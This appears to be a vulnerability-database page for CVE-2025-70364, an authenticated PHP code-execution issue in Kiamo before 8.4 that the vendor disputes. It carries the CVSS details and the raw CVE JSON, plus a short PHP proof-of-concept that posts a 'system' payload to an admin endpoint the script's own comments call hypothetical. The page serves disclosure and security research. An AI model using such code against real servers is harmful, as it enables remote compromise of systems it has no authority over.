Security Vulnerability Report
CVE-2025-70364 (CVSS 8.8, HIGH)

Published: 2026-04-09 16:16:26
Last Modified: 2026-04-22 15:16:12

Description

An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. NOTE: the Supplier's position is that this is "a historical and intended administrative feature of the product, accessible only to already authenticated users explicitly granted administrator privileges." However, restrictions on some PHP functions were added in 8.4.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration (CPE) data available. Affected version range according to the description: Kiamo < 8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/*
 * PoC for CVE-2025-70364: Kiamo Authenticated RCE
 * Description: Conceptual exploit demonstrating code execution.
 * The endpoint path, form field name and session cookie below are
 * hypothetical placeholders, not values taken from the product.
 */

// Target URL (Hypothetical endpoint based on admin feature)
$url = "http://target-kiamo/admin/execute.php";

// Payload to execute 'id' command
$payload = "<?php system('id'); ?>";

// Simulate HTTP POST request as authenticated admin
$postData = [
    'php_code' => $payload
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
curl_setopt($ch, CURLOPT_COOKIE, "admin_session=valid_session_cookie");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

// Output server response
echo $response;
?>

References

http://kiamo.com
https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-70364",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-09T16:16:25.573",
    "lastModified": "2026-04-22T15:16:12.357",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["disputed"]}
    ],
    "descriptions": [
      {"lang": "en", "value": "An issue was discovered in Kiamo before 8.4 allowing authenticated administrative attackers to execute arbitrary PHP code on the server. NOTE: the Supplier's position is that this is \"a historical and intended administrative feature of the product, accessible only to already authenticated users explicitly granted administrator privileges.\" However, restrictions on some PHP functions were added in 8.4."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-94"}]
      }
    ],
    "references": [
      {"url": "http://kiamo.com", "source": "[email protected]"},
      {"url": "https://github.com/hackvens/blog.hackvens.fr/blob/main/_posts/advisories/2025-12-23-CVE-2025-70364-Kiamo.md", "source": "[email protected]"}
    ]
  }
}